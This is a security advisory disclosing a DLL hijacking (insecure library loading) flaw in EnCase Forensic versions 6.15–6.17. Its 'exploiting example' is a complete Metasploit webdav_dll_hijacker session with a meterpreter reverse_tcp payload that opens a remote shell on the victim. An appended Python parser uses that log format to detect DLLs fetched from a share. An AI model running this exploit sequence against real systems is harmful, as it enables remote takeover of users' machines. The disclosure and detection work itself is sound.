Advisory: EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 02.09.2010]
- in a nutshell:
---------------------------------------------
EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------
- EnCase Description
From the simplest requirements to the most complex, EnCase Forensic is the premier computer forensic application on the market.
- Insecure Library Loading allows Remote Code Execution
This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS endump"
For more vulnerability details please check the links in the reference section.
- Affected Versions
v6.15.0.82/6.16.2/6.17.0.90 - other releases may also be affected.
- Solution
It is not known if there are fixed releases available.
- Credits
The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at
- Timeline
29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure
- Reference
- http://www.guidancesoftware.com/forensic.htm
- http://www.microsoft.com/technet/security/advisory/2269637.mspx
- http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
- http://blog.metasploit.com/2010/08/better-faster-stronger.html
- http://www.metasploit.com/modules/exploit/windows/browser/webdav_dll_hij...
- http://www.securityfocus.com/bid/42852
- http://www.s3cur1ty.de/advisories
- Exploiting example:
msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  endump           yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.
msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rsaenh.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /documents/SDDisk.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/SDDisk.dll)
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49310 PROPFIND => 404 (/documents/rundll32.exe)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 14 opened (10.8.28.9:4444 -> 10.8.28.55:49315) at Sun Aug 29 20:01:53 +0200 2010
msf exploit(webdav_dll_hijacker) > sessions -i 14
[*] Starting interaction with 14...
meterpreter > getuid
Server username: m1k3-Vista\m1k3
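The session log above is also the detection artefact: the lines that matter to a defender are the PROPFIND "207 File" hits on .dll paths followed by "GET => DLL Payload", because they name exactly which libraries the application resolved from the remote share instead of its own directory or System32. The following is an added example, not part of the advisory or of Metasploit, that parses lines in that format and reports the libraries each client fetched; the log text is constructed here in the same shape as the output above.

```python
import re
from collections import defaultdict

# Constructed sample in the format of the msfconsole output above; not a real capture.
SAMPLE_LOG = """\
[*] 10.8.28.55:49310 PROPFIND /documents/rsaenh.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /documents/SDDisk.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/SDDisk.dll)
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49310 PROPFIND => 404 (/documents/rundll32.exe)
"""

# "207 File (/path)" lines: the server confirmed a file exists at that path.
FILE_RE = re.compile(
    r"^\[\*\] (?P<client>[\d.]+):\d+ PROPFIND => (?P<code>\d{3}) File \((?P<path>[^)]+)\)$"
)
# "GET => DLL Payload" lines: the client actually downloaded the library.
GET_RE = re.compile(r"^\[\*\] (?P<client>[\d.]+):\d+ GET => DLL Payload$")


def hijacked_dlls(log_text):
    """Return {client_ip: [dll names]} for each library a client both resolved
    on the share (207 File on a .dll path) and then fetched (GET => DLL Payload).
    A 404 (file not present, like rundll32.exe above) or a resolve without a
    following fetch is not counted."""
    pending = {}               # client -> last .dll name resolved but not yet fetched
    fetched = defaultdict(list)
    for line in log_text.splitlines():
        m = FILE_RE.match(line)
        if m:
            path = m.group("path")
            if path.lower().endswith(".dll"):
                pending[m.group("client")] = path.rsplit("/", 1)[-1]
            continue
        m = GET_RE.match(line)
        if m:
            name = pending.pop(m.group("client"), None)
            if name and name not in fetched[m.group("client")]:
                fetched[m.group("client")].append(name)
    return dict(fetched)
```

The same two patterns apply to a WebDAV server's own access log, where a PROPFIND followed by a GET for a .dll from a workstation is a signal worth alerting on.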